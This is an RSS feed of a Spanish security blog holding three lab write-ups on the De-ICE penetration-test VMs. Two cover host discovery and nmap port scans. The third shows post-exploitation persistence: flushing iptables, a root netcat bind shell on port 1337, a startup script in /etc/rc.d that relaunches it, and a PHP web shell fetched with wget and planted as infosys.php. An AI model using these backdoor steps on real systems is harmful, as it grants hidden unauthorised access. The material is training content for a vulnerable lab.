<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track &#187; Nmap</title>
	<atom:link href="http://www.sec-track.com/tag/nmap/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Wed, 01 Feb 2012 15:08:22 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Desarrollo del entorno De-Ice III &#8211; Network Mapping, Port Scanning</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning#comments</comments>
		<pubDate>Thu, 11 Mar 2010 08:48:34 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Footprinting]]></category>
		<category><![CDATA[NetDiscover]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=469</guid>
		<description><![CDATA[Antes de comenzar con el desarrollo de este entorno virtualizado de intrusión creo que es necesario recordar sobre algunos de los objetivos generales en esta primera serie de entornos enfocados a los Test de Penetración. Objetivos Generales para los entornos De-Ice I, II, III y PwnOS También es necesario describir nuevamente el escenario propuesto para [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes  de comenzar con el desarrollo de este entorno virtualizado de intrusión  creo que es necesario recordar sobre algunos de los objetivos generales  en esta primera serie de entornos enfocados a los <a href="http://www.sec-track.com/test-de-penetracion" target="_blank"><strong>Test de Penetración</strong></a>.</p>
<h2 style="text-align: justify;"><a title="Permanent Link to Objetivos Generales para los entornos De-Ice I,  II, III y PwnOS" rel="bookmark" href="../objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos">Objetivos  Generales para los entornos De-Ice I, II, III y PwnOS</a></h2>
<p style="text-align: justify;">También es necesario describir nuevamente el escenario propuesto para este Test de Penetración:</p>
<h2 style="text-align: justify;"><a title="Permanent Link to De-ICE PenTest LiveCDs (Nivel  III)" rel="bookmark" href="../de-ice-pentest-livecds-nivel-iii">De-ICE PenTest LiveCDs (Nivel III)</a></h2>
<p style="text-align: justify;">El procedimiento de implementación de este entorno no varía mucho con respecto a los anteriores. Tan solo cambia la red objetivo, que para esta ocasión será la 192.168.2.*</p>
<p style="text-align: justify;">Identifiquemos los host vivos (conectados) en la red (Tool: <a href="http://www.sec-track.com/tag/netdiscover" target="_blank"><strong>Netdiscover</strong></a> incluída en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a>):</p>
<pre style="text-align: justify;">root@bt:~# netdiscover eth0</pre>
<pre style="text-align: justify;">3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:07    01    060   Unknown vendor
 192.168.2.100   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 192.168.2.101   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 Currently scanning: 192.168.9.0/16   |   Our Mac is: 00:0c:29:ac:c4:e0 - 0</pre>
<p style="text-align: justify;">Una vez hemos identificados los posibles host&#8217;s objetivos pasemos a escanearlos en detalle para obtener más información sobre estos.</p>
<p style="text-align: justify;">Veamos este proceso con Nmap.</p>
<p style="text-align: justify;">Escaneo y explicación enviada por Roguer (jollyroguer [at] gmail.com):</p>
<p style="text-align: justify;"><strong>root@bt: ~#nmap -sP 192.168.2.1-255</strong><br />
Starting Nmap 5.00 ( <a href="http://nmap.org/" target="_blank">http://nmap.org</a> ) at 2010-02-25 23:35 UTC<br />
Host 192.168.2.10 is up.<br />
Host 192.168.2.100 is up (0.00066s latency).<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Host 192.168.2.101 is up (0.00066s latency).<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.06 seconds</p>
<p style="text-align: justify;">En donde obtengo que hay 3 equipos arriba, de los cuales el .10 es mi máquina y los 100 y 101 objetivos enseguida nos centraremos en el equipo .100</p>
<p>Arranco haciendo un escaneo de puertos, como es un entorno seguro no hay necesidad de ocultar la ip de origen</p>
<p><strong>root@bt: ~#nmap -sV -T Aggressive -O 192.168.2.100</strong><br />
Starting Nmap 5.00 ( <a href="http://nmap.org/" target="_blank">http://nmap.org</a> ) at 2010-02-25 23:36 UTC<br />
Interesting ports on <a href="http://192.168.2.100/" target="_blank">192.168.2.100</a>:<br />
Not shown: 992 filtered ports<br />
PORT    STATE  SERVICE  VERSION<br />
20/tcp  closed ftp-data<br />
21/tcp  open   ftp      vsftpd 2.0.4<br />
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)<br />
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7<br />
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
110/tcp open   pop3     Openwall popa3d<br />
143/tcp open   imap     UW imapd 2004.357<br />
443/tcp closed https<br />
MAC Address: 00:0C:29:78:57:AE (VMware)<br />
Device type: general purpose<br />
Running: Linux 2.6.X<br />
OS details: Linux 2.6.13 &#8211; 2.6.24<br />
Network Distance: 1 hop<br />
Service Info: Host: <a href="http://slax.example.net/" target="_blank">slax.example.net</a>;  OS: Unix<br />
OS and Service detection performed. Please report any incorrect<br />
results at <a href="http://nmap.org/submit/" target="_blank">http://nmap.org/submit/</a> .<br />
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds</p>
<p style="text-align: justify;">Como podemos ver hay varios servicios corriendo en este equipo, así que vamos a tratar de obternet información como en los entornos anteriores.</p>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;">Realicemos un escaneo para identificar servicios y versiones en el host 192.168.2.101</p>
<p style="text-align: justify;"><strong>root@bt:~# nmap -PT80 192.168.2.101</strong></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:09 COT<br />
Interesting ports on 192.168.2.101:<br />
Not shown: 999 filtered ports<br />
PORT   STATE SERVICE<br />
80/tcp open  http<br />
MAC Address: 00:0C:29:0C:B9:E5 (VMware)</p>
<p style="text-align: justify;"><strong>root@bt:~# nmap -sV -p 80 192.168.2.101</strong></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:12 COT<br />
Interesting ports on 192.168.2.101:<br />
PORT   STATE SERVICE VERSION<br />
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
MAC Address: 00:0C:29:0C:B9:E5 (VMware)</p>
<p>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds</p>
<p style="text-align: justify;">Perfecto el proceso de mapeo de red e identificación de aplicaciones y servicios en los host objetivos. En el próximo post centraremos nuestra atención a las actvidades relacionadas con la enumeración del objetivo e identificación de posibles puntos de intrusión.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarollo del Entorno De-Ice II – Network Mapping, Port Scanning</title>
		<link>http://www.sec-track.com/desarollo-del-entorno-de-ice-ii-%e2%80%93-network-mapping-port-scanning</link>
		<comments>http://www.sec-track.com/desarollo-del-entorno-de-ice-ii-%e2%80%93-network-mapping-port-scanning#comments</comments>
		<pubDate>Wed, 20 Jan 2010 16:35:41 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Escaneo de Puertos]]></category>
		<category><![CDATA[Network Mapping]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Port Scanning]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=353</guid>
		<description><![CDATA[Antes de comenzar con el desarrollo de este entorno virtualizado de intrusión creo que es necesario recordar sobre algunos de los objetivos generales en esta primera serie de entornos enfocados a los Test de Penetración. Objetivos Generales para los entornos De-Ice I, II, III y PwnOS Ahora bien, comencemos con el mapeo de red y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con el desarrollo de este entorno virtualizado de intrusión creo que es necesario recordar sobre algunos de los objetivos generales en esta primera serie de entornos enfocados a los Test de Penetración.</p>
<h2 style="text-align: justify;"><a title="Permanent Link to Objetivos Generales para los entornos De-Ice I, II, III y PwnOS" rel="bookmark" href="../objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos">Objetivos Generales para los entornos De-Ice I, II, III y PwnOS</a></h2>
<p style="text-align: justify;">Ahora bien, comencemos con el mapeo de red y el escanéo de puertos. Para ello nada mejor que el archiconocido Network Mapper (<a href="http://www.sec-track.com/tag/nmap" target="_blank"><strong>Nmap</strong></a>) (Incluída en <a href="http://www.sec-track.com/tag/backtrack" target="_blank"><strong>BackTrack</strong></a>).</p>
<p style="text-align: justify;"><span id="more-353"></span></p>
<p style="text-align: justify;">Probemos con un barrido de pings con <a href="http://www.sec-track.com/tag/nmap" target="_blank"><strong>Nmap</strong></a>.</p>
<p style="text-align: justify;"><em><strong>root@bt:~# nmap -sP 192.168.1.*</strong></em></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-19 02:23 COT<br />
Host desktop.lan (192.168.1.2) is up.<br />
Host 192.168.1.110 is up (0.00059s latency).<br />
MAC Address: 08:00:27:FE:36:B6 (Cadmus Computer Systems)<br />
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.21 seconds</p>
<p style="text-align: justify;">Comprobemos estos resultados utilizando la herramienta <a href="http://parseerror.com/lanmap/" target="_blank"><strong>lanmap</strong></a> (Incluída en <strong><a href="http://www.sec-track.com/tag/backtrack" target="_blank">BackTrack</a></strong>)</p>
<p style="text-align: justify;"><em><strong>root@bt:~# lanmap -i wlan0 -T png -o /tmp/</strong></em><br />
cmd:twopi -Tpng -o /tmp/tmp.lanmap lanmap.dot &amp;&amp; mv /tmp/tmp.lanmap /tmp/lanmap.png &amp;&amp; rm lanmap.dot</p>
<p style="text-align: justify;"><img class="aligncenter" title="Lanmap" src="http://img193.imageshack.us/img193/7151/lanmap.png" alt="" width="269" height="421" /></p>
<p style="text-align: justify;">Una vez identificados los host conectados en ese segmento de red comprobemos y listemos cual de ellos es nuestro sistema objetivo. Para ello identifiquemos el estado de sus puertos y los servicios que se ejecutan sobre ellos.</p>
<p style="text-align: justify;">Volvamos a <a href="http://www.sec-track.com/tag/nmap" target="_blank"><strong>Nmap</strong></a>:</p>
<p style="text-align: justify;"><em><strong>root@bt:~# nmap 192.168.1.110</strong></em></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-20 10:36 EST<br />
Interesting ports on 192.168.1.110:<br />
Not shown: 996 closed ports<br />
PORT    STATE SERVICE<br />
21/tcp  open  ftp<br />
22/tcp  open  ssh<br />
80/tcp  open  http<br />
631/tcp open  ipp<br />
MAC Address: 00:0C:29:58:68:0D (VMware)</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds</p>
<p style="text-align: justify;">Según estos resultados este host tiene altas posibilidades de ser el sistema objetivo por los puertos ofrecidos (Y nos lo dicen en las <a href="http://www.sec-track.com/de-ice-pentest-livecds-nivel-ii" target="_blank">instrucciones</a>&#8230; pero como la idea es aprender más entonces hice el escaneo para mostrar como podemos identificar este tipo de información).</p>
<p style="text-align: justify;">Ahora profundicemos sobre las versiones de dichos puertos:</p>
<p style="text-align: justify;"><em><strong>root@bt:~# nmap -sV -O -p 21,22,80,631 -D 10.1.1.1 192.168.1.110</strong></em></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-20 10:40 EST<br />
Interesting ports on 192.168.1.110:<br />
PORT    STATE SERVICE VERSION<br />
21/tcp  open  ftp     vsftpd 2.0.4<br />
22/tcp  open  ssh?<br />
80/tcp  open  http    Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)<br />
631/tcp open  ipp     CUPS 1.1<br />
MAC Address: 00:0C:29:58:68:0D (VMware)<br />
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port<br />
Device type: general purpose<br />
Running: Linux 2.6.X<br />
OS details: Linux 2.6.13 &#8211; 2.6.24<br />
Network Distance: 1 hop<br />
Service Info: OS: Unix</p>
<p>OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds</p>
<p style="text-align: justify;">La idea es que para el próximo post se investigue sobre la funcionalidad de cada uno de esos puertos y consultemos además si existen vulnerabilidades para dichas versiones&#8230; Además vendría bien realizar intentos de conexión a dicho puertos para analizar las respuestas obtenidas.</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarollo-del-entorno-de-ice-ii-%e2%80%93-network-mapping-port-scanning/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Entorno De-Ice nivel I – Backdoors, Manteniendo el Acceso</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-nivel-i-%e2%80%93-backdoors-manteniendo-el-acceso#comments</comments>
		<pubDate>Thu, 10 Dec 2009 06:53:00 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[IPTABLES]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Shell PHP]]></category>
		<category><![CDATA[Wget]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=281</guid>
		<description><![CDATA[Ahora que hemos conseguido elevar privilegios y acceder a la información crítica contenida en el sistema objetivo, veamos algunos métodos para mantener el acceso al sistema. Sobra aclarar que toda la información publicada es de carácter educativo, y solo busca recrear de la mejor manera los ataques a los que están expuestos los sistemas y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ahora que hemos conseguido elevar privilegios y acceder a la información crítica contenida en el sistema objetivo, veamos algunos métodos para mantener el acceso al sistema. Sobra aclarar que toda la información publicada es de carácter educativo, y solo busca recrear de la mejor manera los ataques a los que están expuestos los sistemas y sus administradores y oficiales de seguridad. Todo ello con la finalidad de adquirir destrezas y habilidades en los temas relacionados con los Test de Penetración.</p>
<p style="text-align: justify;"><span id="more-281"></span>La finalidad de usar sistemas backdoors (puertas traseras) es mantener un acceso al sistema de manera oculta al administrador del sistema, los cuales permitirán una entrada luego de un reinicio del sistema o ciertas condiciones a la que se someta el sistema sin necesidad de penetrar nuevamente el sistema.</p>
<p style="text-align: justify;">El tema de backdoors en sistemas es más un arte que una técnica, ya que esta obliga al PenTester a usar toda su creatividad e imaginación para lograr su objetivo de conseguir un acceso en cualquier momento al sistema sin ser descubierto.</p>
<p style="text-align: justify;">Solo mostraré algunos métodos para crear puertas traseras con la herramienta Netcat y otro con el servicio de publicación en Web (PHP), con la finalidad de que los lectores se animen y publiquen los métodos que conozcan y nos vayamos preparando para los entornos que vienen.</p>
<p style="text-align: justify;">Ya hemos hablado anteriormente de Netcat (<a title="Permanent Link to Video Tutorial Netcat en BackTrack" rel="bookmark" href="../video-tutorial-netcat-en-backtrack">Video Tutorial Netcat en BackTrack</a>), ahora aprovechemos el entorno disponible para practicar los aprendido.</p>
<p style="text-align: justify;">Para nuestra fortuna, en el entorno De-Ice I netcat se encuentra disponible en dicho sistema, por lo tanto solo necesitamos dejarlo a la escucha.</p>
<p style="text-align: justify;">Antes de ello es necesario verificar como se encuentra configurado el sistema de IPTABLES con la finalidad de analizar como se realizan las conexiones al sistema (conexiones permitidas, conexiones denegadas, etc)</p>
<p style="text-align: justify;"><em><strong>root@slax:/# iptables -L</strong></em><br />
Chain INPUT (policy ACCEPT)<br />
target     prot opt source               destination<br />
ACCEPT     all  &#8211;  anywhere             anywhere<br />
ACCEPT     udp  &#8211;  anywhere             anywhere            udp dpt:domain<br />
ACCEPT     udp  &#8211;  anywhere             anywhere            udp spt:domain<br />
ACCEPT     all  &#8211;  anywhere             anywhere            state RELATED,ESTAB                                              LISHED<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ftp-data<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ftp<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:ssh<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:smtp<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:http<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:pop3<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:imap<br />
ACCEPT     tcp  &#8211;  anywhere             anywhere            tcp dpt:https<br />
LOG_DROP   all  &#8211;  anywhere             anywhere</p>
<p>Chain FORWARD (policy ACCEPT)<br />
target     prot opt source               destination<br />
LOG_DROP   all  &#8211;  anywhere             anywhere</p>
<p>Chain OUTPUT (policy ACCEPT)<br />
target     prot opt source               destination<br />
ACCEPT     all  &#8211;  anywhere             anywhere</p>
<p>Chain LOG_DROP (2 references)<br />
target     prot opt source               destination<br />
DROP       all  &#8211;  anywhere             anywhere</p>
<p style="text-align: justify;">Si quisieramos tirar abajo todas las reglas (no recomendado para el objetivo de pasar desapercibido) solo basta con ejecutar la siguiente instrucción.</p>
<p style="text-align: justify;"><em><strong>root@slax:/# iptables -F</strong></em></p>
<p style="text-align: justify;">La idea es que los lectores propongan una de las muchas maneras de agregar esta conexión a las reglas de IPTABLES sin tirar las demás abajo (<a href="http://es.wikipedia.org/wiki/Netfilter/iptables" target="_blank">Más información sobre IPTABLES y su configuración/edición</a>)</p>
<p style="text-align: justify;">Luego de esta &#8220;limpieza&#8221; de reglas vemos como quitamos la negación a peticiones ICMP que observamos al comienzo de la prueba.</p>
<p style="text-align: justify;"><em><strong>S3cTr4cK@0100100-0100100 ~<br />
$ ping 192.168.1.100</strong></em></p>
<p>Pinging 192.168.1.100 with 32 bytes of data:</p>
<p>Reply from 192.168.1.100: bytes=32 time=1ms TTL=64<br />
Reply from 192.168.1.100: bytes=32 time=1ms TTL=64</p>
<p>Ping statistics for 192.168.1.100:<br />
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),<br />
Approximate round trip times in milli-seconds:<br />
Minimum = 1ms, Maximum = 1ms, Average = 1ms</p>
<p style="text-align: justify;">Ahora ejecutemos a netcat en modo escucha en el sistema objetivo (De-Ice I)</p>
<p style="text-align: justify;"><em><strong>root@slax:/# nc -l -p 1337 -e /bin/bash</strong></em></p>
<p style="text-align: justify;">Si realizaramos un escaneo sencillo con nmap a varios puertos incluyendo el que dejamos a la escucha, encontraríamos los siguientes:</p>
<p style="text-align: justify;"><em><strong>C:\Program Files\Nmap&gt;nmap -p 22,25,80,443,1337 192.168.1.100</strong></em></p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-09 23:51 SA Pacific Standard T<br />
Interesting ports on 192.168.1.100:<br />
PORT     STATE  SERVICE<br />
22/tcp   open   ssh<br />
25/tcp   open   smtp<br />
80/tcp   open   http<br />
443/tcp  closed https<br />
<strong>1337/tcp open   waste</strong><br />
MAC Address: 00:1A:73:90:81:0B (Gemtek Technology Co.)</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds</p>
<p style="text-align: justify;">Ahora desde nuestro sistema cliente (atacante) solo basta conectarnos al puerto que dejamos a la escucha (1337) y ejecutar algunos comandos:</p>
<p style="text-align: justify;"><em><strong>C:\Documents and Settings\S3cTr4cK\My Documents\Descargas\nc&gt;nc 192.168.1.100 1337<br />
whoami</strong></em><br />
root<br />
<em><strong>pwd</strong></em><br />
/<br />
<em><strong>ifconfig</strong></em><br />
eth0      Link encap:Ethernet  HWaddr 00:0C:29:43:03:6B<br />
inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0<br />
inet6 addr: fe80::20c:29ff:fe43:36b/64 Scope:Link<br />
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br />
RX packets:6377 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:1365 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:1000<br />
RX bytes:438725 (428.4 KiB)  TX bytes:169876 (165.8 KiB)<br />
Interrupt:5 Base address:0&#215;2000</p>
<p>lo        Link encap:Local Loopback<br />
inet addr:127.0.0.1  Mask:255.0.0.0<br />
inet6 addr: ::1/128 Scope:Host<br />
UP LOOPBACK RUNNING  MTU:16436  Metric:1<br />
RX packets:176 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:176 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 txqueuelen:0<br />
RX bytes:15878 (15.5 KiB)  TX bytes:15878 (15.5 KiB)</p>
<p><em><strong>uname -a</strong></em><br />
Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 athlon-4 i386 GNU/Linux</p>
<p style="text-align: justify;">Ahora bien&#8230; ¿Qué pasaría si quisieramos que dicha instrucción se ejecutara al inicio del sistema objetivo?</p>
<p style="text-align: justify;">Solo basta automatizar dicho inicio alojando la instrucción (script) en el directorio <strong>/etc/rc.d</strong></p>
<p style="text-align: justify;">Veamos el contenido de este directorio y un ejemplo de script para dicho propósito:</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# ls</strong></em><br />
rc.0         rc.alsa      rc.inet1       rc.nfsd        rc.sshd<br />
rc.4         rc.bind      rc.inet1.conf  rc.pcmcia      rc.syslog<br />
rc.6         rc.cups      rc.inet2       rc.portmap     rc.sysvinit<br />
rc.FireWall  rc.firewall  rc.inetd       rc.saslauthd   rc.udev<br />
rc.K         rc.font.new  rc.ip_forward  rc.sendmail    rc.vsftpd<br />
rc.M         rc.gpm       rc.local       rc.serial      rc.wireless<br />
rc.S         rc.hotplug   rc.modules     rc.slax        rc.wireless.conf<br />
rc.acpid     rc.httpd     rc.mysqld      rc.slaxconfig</p>
<p style="text-align: justify;">Hagamos entonces lo mismo para Netcat</p>
<p style="text-align: justify;"><strong>Script:</strong></p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# vi rc.netcat1</strong></em><br />
#!/bin/sh<br />
mkdir /tmp/netcat<br />
while true ; do<br />
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash<br />
done</p>
<p style="text-align: justify;">Y quedaría así:</p>
<p style="text-align: justify;"><em><strong>root@slax:/etc/rc.d# more rc.netcat1</strong></em><br />
#!/bin/sh<br />
mkdir /tmp/netcat<br />
while true ; do<br />
cd /tmp/netcat | nc -l -p 1337 -e /bin/bash<br />
done</p>
<p style="text-align: justify;">Otra buena opción sería utilizar a Netcat en modo reverse shell, que también ha sido tratado en el video tutorial citado anteriormente.</p>
<p style="text-align: justify;">El tercer método para habilitar una puerta tracera en el sistema de manera más &#8220;discreta&#8221; puede ser el uso del servidor web en la máquina objetivo, veamos:</p>
<p style="text-align: justify;">Para ello haremos uso de una shell en el leguaje del lado del servidor PHP.</p>
<p style="text-align: justify;">Primero debemos descargarla y transferirla a la máquina objetivo.</p>
<p style="text-align: justify;">Para la transferencia he habilitado un server en mi máquina, solo basta realizar la petición con wget:</p>
<p style="text-align: justify;"><em><strong>root@slax:~/Desktop# wget http://192.168.1.3/shellphp.txt</strong></em><br />
&#8211;00:34:53&#8211;  http://192.168.1.3/shellphp.txt<br />
=&gt; `shellphp.txt&#8217;<br />
Connecting to 192.168.1.3:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 63,743 (62K) [text/plain]</p>
<p>100%[====================================&gt;] 63,743        &#8211;.&#8211;K/s</p>
<p>00:34:53 (64.06 MB/s) &#8211; `shellphp.txt&#8217; saved [63743/63743]</p>
<p><em><strong>root@slax:~/Desktop# ls</strong></em><br />
Home.desktop  System.desktop  shellphp.txt</p>
<p style="text-align: justify;">root@slax:~/Desktop# cp shellphp.txt /var/www/htdocs/infosys.php</p>
<p style="text-align: justify;">Luego solo bastaría con ingresar en cualquier momento a dicha URL, para mi caso:</p>
<p style="text-align: justify;"><em><strong>http://192.168.1.100/infosys.php</strong></em></p>
<table id="table1" style="border: 1px none #333333; height: 90px;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="300" height="30" align="left"><strong><span style="font-size: x-small;">File / Folder Name</span></strong></td>
<td width="82" height="28" align="center">#                 <span style="color: #000080; font-size: x-small;"><strong>Size KByte</strong></span></td>
<td width="83" height="28" align="center">#                 <span style="color: #006600; font-size: x-small;"><strong>Download</strong></span></td>
<td width="66" height="28" align="center">#                 <span style="color: #ff9933; font-size: x-small;"><strong>Edit</strong></span></td>
<td width="75" height="28" align="center">#                 <span style="color: #999999; font-size: x-small;"><strong>Chmod</strong></span></td>
<td height="28" align="center"><span style="color: #ff0000; font-size: x-small;"><strong>Delete</strong></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="text-decoration: none;"><span style="color: #666666; font-size: x-small;"> . <span style="color: #ff0000; font-size: xx-small;">dir</span></span></span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong> # </strong></span></td>
<td width="103" align="center">#</td>
<td width="77" align="center">#</td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="text-decoration: none;"><span style="color: #666666; font-size: x-small;"> .. <span style="color: #ff0000; font-size: xx-small;">dir</span></span></span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong> # </strong></span></td>
<td width="103" align="center">#</td>
<td width="77" align="center">#</td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> infosys.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>62 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> level.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>2 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> index2.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>3 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #999999; font-size: x-small;">Chmod</span></span></td>
<td width="86" align="center"><span style="text-decoration: none;"><span style="color: #ff0000; font-size: x-small;">Delete</span></span></td>
</tr>
<tr>
<th width="250" height="22" align="left"><span style="color: #666666; font-size: x-small;"> index.php </span></th>
<td width="113" align="center"><span style="color: #000080; font-size: x-small;"><strong>2 # </strong></span></td>
<td width="103" align="center"><span style="text-decoration: none;"><span style="color: #006600; font-size: x-small;">download # </span></span></td>
<td width="77" align="center"><span style="text-decoration: none;"><span style="color: #ff9933; font-size: x-small;">Edit # </span></span></td>
